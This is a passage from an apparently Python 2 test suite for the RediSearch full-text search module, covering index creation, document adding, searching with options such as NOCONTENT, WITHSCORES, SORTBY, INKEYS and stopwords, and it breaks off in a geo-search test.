res = r.execute_command('ft.search', 'idx', '')
env.assertListEqual([0], res)
# Test searching with no content
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent')
env.assertTrue(len(res) == 3)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertEqual(res[2], "doc1")
# Test searching WITHSCORES
res = r.execute_command(
'ft.search', 'idx', 'hello', 'WITHSCORES')
env.assertEqual(len(res), 7)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(float(res[2]) > 0)
env.assertEqual(res[4], "doc1")
env.assertTrue(float(res[5]) > 0)
# Test searching WITHSCORES NOCONTENT
res = r.execute_command(
'ft.search', 'idx', 'hello', 'WITHSCORES', 'NOCONTENT')
env.assertEqual(len(res), 5)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(float(res[2]) > 0)
env.assertEqual(res[3], "doc1")
env.assertTrue(float(res[4]) > 0)
def testSearchNosave(env):
# Check to see what happens when we try to return unsaved documents
env.cmd('ft.create', 'idx', 'SCHEMA', 'f1', 'text')
# Add 3 documents
for x in range(3):
env.cmd('ft.add', 'idx', 'doc{}'.format(x),
1.0, 'NOSAVE', 'FIELDS', 'f1', 'value')
# Now query the results
res = env.cmd('ft.search', 'idx', 'value')
env.assertEqual(3, res[0])
for content in res[2::2]:
env.assertEqual([], content)
def testGet(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'text'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world', 'bar', 'wat wat'))
for i in range(100):
res = r.execute_command('ft.get', 'idx', 'doc%d' % i)
env.assertIsNotNone(res)
env.assertListEqual(
['foo', 'hello world', 'bar', 'wat wat'], res)
env.assertIsNone(r.execute_command(
'ft.get', 'idx', 'doc%dsdfsd' % i))
rr = r.execute_command(
'ft.mget', 'idx', *('doc%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNotNone(res)
env.assertListEqual(
['foo', 'hello world', 'bar', 'wat wat'], res)
rr = r.execute_command(
'ft.mget', 'idx', *('doc-%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNone(res)
# Verify that when a document is deleted, GET returns NULL
r.cmd('ft.del', 'idx', 'doc10') # But we still keep the document
r.cmd('ft.del', 'idx', 'doc11')
res = r.cmd('ft.get', 'idx', 'doc10')
r.assertEqual(None, res)
res = r.cmd('ft.mget', 'idx', 'doc10', 'doc11', 'doc12')
r.assertIsNone(res[0])
r.assertIsNone(res[1])
r.assertTrue(not not res[2])
def testDelete(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
for i in range(100):
# the doc hash should exist now
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
# Delete the actual docs only half of the time
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i, 'DD' if i % 2 == 0 else ''))
# second delete should return 0
env.assertEqual(0, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
# After del with DD the doc hash should not exist
if i % 2 == 0:
env.assertFalse(r.exists('doc%d' % i))
else:
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertNotIn('doc%d' % i, res)
env.assertEqual(res[0], 100 - i - 1)
env.assertEqual(len(res), 100 - i)
# test reinsertion
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertIn('doc%d' % i, res)
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
for _ in r.retry_with_rdb_reload():
did = 'rrrr'
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
def testReplace(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world')
env.assertEqual(2, res[0])
with env.assertResponseError():
# make sure we can't insert a doc twice
res = r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world')
# now replace doc1 with a different content
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'replace', 'fields',
'f', 'goodbye universe'))
for _ in r.retry_with_rdb_reload():
# make sure the query for hello world does not return the replaced
# document
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc2', res[1])
# search for the doc's new content
res = r.execute_command(
'ft.search', 'idx', 'goodbye universe', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
def testDrop(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
env.assertOk(r.execute_command('ft.drop', 'idx'))
keys = r.keys('*')
env.assertEqual(0, len(keys))
# Now do the same with KEEPDOCS
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
if not env.is_cluster():
env.assertOk(r.execute_command('ft.drop', 'idx', 'KEEPDOCS'))
keys = r.keys('*')
env.assertListEqual(['doc0', 'doc1', 'doc10', 'doc11', 'doc12', 'doc13', 'doc14', 'doc15', 'doc16', 'doc17', 'doc18', 'doc19', 'doc2', 'doc20', 'doc21', 'doc22', 'doc23', 'doc24', 'doc25', 'doc26', 'doc27', 'doc28', 'doc29', 'doc3', 'doc30', 'doc31', 'doc32', 'doc33', 'doc34', 'doc35', 'doc36', 'doc37', 'doc38', 'doc39', 'doc4', 'doc40', 'doc41', 'doc42', 'doc43', 'doc44', 'doc45', 'doc46', 'doc47', 'doc48', 'doc49', 'doc5', 'doc50', 'doc51', 'doc52', 'doc53',
'doc54', 'doc55', 'doc56', 'doc57', 'doc58', 'doc59', 'doc6', 'doc60', 'doc61', 'doc62', 'doc63', 'doc64', 'doc65', 'doc66', 'doc67', 'doc68', 'doc69', 'doc7', 'doc70', 'doc71', 'doc72', 'doc73', 'doc74', 'doc75', 'doc76', 'doc77', 'doc78', 'doc79', 'doc8', 'doc80', 'doc81', 'doc82', 'doc83', 'doc84', 'doc85', 'doc86', 'doc87', 'doc88', 'doc89', 'doc9', 'doc90', 'doc91', 'doc92', 'doc93', 'doc94', 'doc95', 'doc96', 'doc97', 'doc98', 'doc99'], sorted(keys))
def testCustomStopwords(env):
r = env
# Index with default stopwords
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
# Index with custom stopwords
env.assertOk(r.execute_command('ft.create', 'idx2', 'stopwords', 2, 'hello', 'world',
'schema', 'foo', 'text'))
# Index with NO stopwords
env.assertOk(r.execute_command('ft.create', 'idx3', 'stopwords', 0,
'schema', 'foo', 'text'))
for idx in ('idx', 'idx2', 'idx3'):
env.assertOk(r.execute_command(
'ft.add', idx, 'doc1', 1.0, 'fields', 'foo', 'hello world'))
env.assertOk(r.execute_command(
'ft.add', idx, 'doc2', 1.0, 'fields', 'foo', 'to be or not to be'))
for _ in r.retry_with_rdb_reload():
# Normal index should return results just for 'hello world'
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent'))
env.assertEqual([0], r.execute_command(
'ft.search', 'idx', 'to be or not', 'nocontent'))
# Custom SW index should return results just for 'to be or not'
env.assertEqual([0], r.execute_command(
'ft.search', 'idx2', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx2', 'to be or not', 'nocontent'))
# No SW index should return results for both
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx3', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx3', 'to be or not', 'nocontent'))
def testStopwords(env):
# This test was taken from Python's tests, and failed due to some changes
# made earlier
env.cmd('ft.create', 'idx', 'stopwords', 3, 'foo',
'bar', 'baz', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'foo bar')
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields', 'txt', 'hello world')
r1 = env.cmd('ft.search', 'idx', 'foo bar', 'nocontent')
r2 = env.cmd('ft.search', 'idx', 'foo bar hello world', 'nocontent')
env.assertEqual(0, r1[0])
env.assertEqual(1, r2[0])
def testNoStopwords(env):
# This test taken from Java's test suite
env.cmd('ft.create', 'idx', 'schema', 'title', 'text')
for i in range(100):
env.cmd('ft.add', 'idx', 'doc{}'.format(i), 1.0, 'fields',
'title', 'hello world' if i % 2 == 0 else 'hello worlds')
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOCONTENT')
env.assertEqual(100, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world',
'VERBATIM', 'NOCONTENT')
env.assertEqual(50, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOSTOPWORDS')
env.assertEqual(0, res[0])
def testOptional(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', 1.0, 'fields', 'foo', 'hello wat woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'foo', 'hello world woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'foo', 'hello world werld'))
res = r.execute_command('ft.search', 'idx', 'hello', 'nocontent')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([2L, 'doc3', 'doc2'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world ~werld', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', '~world ~werld hello', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
def testExplain(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
q = '(hello world) "what what" hello|world @bar:[10 100]|@bar:[200 300]'
res = r.execute_command('ft.explain', 'idx', q)
# print res.replace('\n', '\\n')
# expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
# expected = """INTERSECT {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
env.assertEqual(res, expected)
# expected = ['INTERSECT {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
if env.is_cluster():
raise unittest.SkipTest()
res = env.cmd('ft.explainCli', 'idx', q)
expected = ['INTERSECT {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
env.assertEqual(expected, res)
def testNoIndex(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex', 'sortable'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'hello lorem ipsum'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1, 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@extra:hello', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@num:[1 1]', 'nocontent')
env.assertListEqual([0], res)
def testPartial(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex'))
# print r.execute_command('ft.info', 'idx')
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', '0.1', 'fields',
'foo', 'hello world', 'num', 2, 'extra', 'abba'))
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'asc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc1', '#1', 'doc2', '#2'], res)
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'desc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc2', '#2', 'doc1', '#1'], res)
# Updating non indexed fields doesn't affect search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'num', 3, 'extra', 'jorem gipsum'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'sortby', 'num', 'desc',)
assertResultsEqual(env, [2L, 'doc1', ['foo', 'hello world', 'num', '3', 'extra', 'jorem gipsum'],
'doc2', ['foo', 'hello world', 'num', '2', 'extra', 'abba']], res)
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'withscores')
# Updating only indexed field affects search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'foo', 'wat wet'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = r.execute_command('ft.search', 'idx', 'wat', 'nocontent')
env.assertListEqual([1L, 'doc1'], res)
# Test updating of score and no fields
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
env.assertLess(float(res[2]), 1)
# env.assertListEqual([1L, 'doc1'], res)
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', '1.0', 'replace', 'partial', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
env.assertGreater(float(res[2]), 1)
# Test updating payloads
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertIsNone(res[2])
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '1.0',
'replace', 'partial', 'payload', 'foobar', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertEqual('foobar', res[2])
def testPaging(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', '%d' % i, 1, 'fields',
'foo', 'hello', 'bar', i))
chunk = 7
offset = 0
while True:
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'desc', 'limit', offset, chunk)
env.assertEqual(res[0], N)
if offset + chunk > N:
env.assertTrue(len(res) - 1 <= chunk)
break
env.assertEqual(len(res), chunk + 1)
for n, id in enumerate(res[1:]):
env.assertEqual(int(id), N - 1 - (offset + n))
offset += chunk
chunk = random.randrange(1, 10)
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'asc', 'limit', N, 10)
env.assertEqual(res[0], N)
env.assertEqual(len(res), 1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, -1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', -1, 10)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 2000000)
def testPrefix(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'constant term', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'const* term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'constant term1*', 'nocontent')
env.assertGreater(res[0], 2)
res = r.execute_command(
'ft.search', 'idx', 'const* -term*', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term9*', 'nocontent')
env.assertEqual([0], res)
def testSortBy(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'sortable', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello%03d world' % i, 'bar', 100 - i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo', 'desc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'desc')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'asc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withscores', 'limit', '2', '5')
env.assertEqual(
[100L, 'doc2', '0', 'doc3', '0', 'doc4', '0', 'doc5', '0', 'doc6', '0'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual(
[100L, 'doc0', '#100', 'doc1', '#99', 'doc2', '#98', 'doc3', '#97', 'doc4', '#96'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'foo', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual([100L, 'doc99', '$hello099 world', 'doc98', '$hello098 world', 'doc97', '$hello097 world', 'doc96',
'$hello096 world', 'doc95', '$hello095 world'], res)
def testNot(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
N = 10
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for i in range(5):
inclusive = r.execute_command(
'ft.search', 'idx', 'constant term%d' % i, 'nocontent', 'limit', 0, N)
exclusive = r.execute_command(
'ft.search', 'idx', 'constant -term%d' % i, 'nocontent', 'limit', 0, N)
exclusive2 = r.execute_command(
'ft.search', 'idx', '-(term%d)' % i, 'nocontent', 'limit', 0, N)
exclusive3 = r.execute_command(
'ft.search', 'idx', '(-term%d) (constant)' % i, 'nocontent', 'limit', 0, N)
env.assertNotEqual(inclusive[0], N)
env.assertEqual(inclusive[0] + exclusive[0], N)
env.assertEqual(exclusive3[0], exclusive2[0])
env.assertEqual(exclusive3[0], exclusive[0])
s1, s2, s3, s4 = set(inclusive[1:]), set(
exclusive[1:]), set(exclusive2[1:]), set(exclusive3[1:])
env.assertTrue(s1.difference(s2) == s1)
env.assertTrue(s1.difference(s3) == s1)
env.assertTrue(s1.difference(s4) == s1)
env.assertTrue(s2 == s3)
env.assertTrue(s2 == s4)
env.assertTrue(s2.intersection(s1) == set())
env.assertTrue(s3.intersection(s1) == set())
env.assertTrue(s4.intersection(s1) == set())
# NOT on a non existing term
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -dasdfasdf', 'nocontent')[0], N)
# not on env term
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -constant', 'nocontent'), [0])
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -(term0|term1|term2|term3|term4|nothing)', 'nocontent'), [0])
# env.assertEqual(r.execute_command('ft.search', 'idx', 'constant -(term1 term2)', 'nocontent')[0], N)
def testNestedIntersection(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'a', 'text', 'b', 'text', 'c', 'text', 'd', 'text'))
for i in range(20):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'a', 'foo', 'b', 'bar', 'c', 'baz', 'd', 'gaz'))
res = [
r.execute_command('ft.search', 'idx',
'foo bar baz gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@a:foo @b:bar @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@b:bar @a:foo @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@c:baz @b:bar @a:foo @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@d:gaz @c:baz @b:bar @a:foo', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@a:foo (@b:bar (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@c:baz (@a:foo (@b:bar (@c:baz @d:gaz)))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@b:bar (@a:foo (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@d:gaz (@a:foo (@c:baz @b:bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar baz gaz)', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar (baz gaz))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar (foo bar) (foo bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (foo (bar baz (gaz)))', 'nocontent'),
r.execute_command('ft.search', 'idx', 'foo (foo (bar (baz (gaz (foo bar (gaz))))))', 'nocontent')]
for i, r in enumerate(res):
# print i, res[0], r
env.assertListEqual(res[0], r)
def testInKeys(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
for i in range(200):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world'))
for _ in r.retry_with_rdb_reload():
for keys in (
['doc%d' % i for i in range(10)], ['doc%d' % i for i in range(0, 30, 2)], [
'doc%d' % i for i in range(99, 0, -5)]
):
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', len(keys), *keys)
env.assertEqual(len(keys), res[0])
env.assertTrue(all((k in res for k in keys)))
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', 3, 'foo', 'bar', 'baz')[0])
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', 99)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', -1)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'inkeys', 4, 'foo')
def testSlopInOrder(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'title', 't1 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1, 'fields',
'title', 't1 t3 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3', 1, 'fields',
'title', 't1 t3 t4 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc4', 1, 'fields',
'title', 't1 t3 t4 t5 t2'))
res = r.execute_command(
'ft.search', 'idx', 't1|t4 t3|t2', 'slop', '0', 'inorder', 'nocontent')
env.assertEqual({'doc3', 'doc4', 'doc2', 'doc1'}, set(res[1:]))
res = r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'inorder')[0])
env.assertEqual(1, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '0', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '1', 'inorder')[0])
env.assertEqual(3, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '2', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '3', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'inorder')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't t1', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4', 'inorder')[0])
def testExact(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello another world',
'body', 'lorem ist ipsum lorem lorem'))
res = r.execute_command(
'ft.search', 'idx', '"hello world"', 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', "hello \"another world\"", 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testGeo(env):
r = env
gsearch = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', query, 'geofilter', 'location', lon, lat, dist, unit)
gsearch_inline = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', '{} @location:[{} {} {} {}]'.format(query, lon, lat, dist, unit))
env.assertOk(r.execute_command('ft.create', 'idx',
'schema', 'name', 'text', 'location', 'geo'))
for i, hotel in enumerate(hotels):
env.assertOk(r.execute_command('ft.add', 'idx', 'hotel{}'.format(i), 1.0, 'fields', 'name',
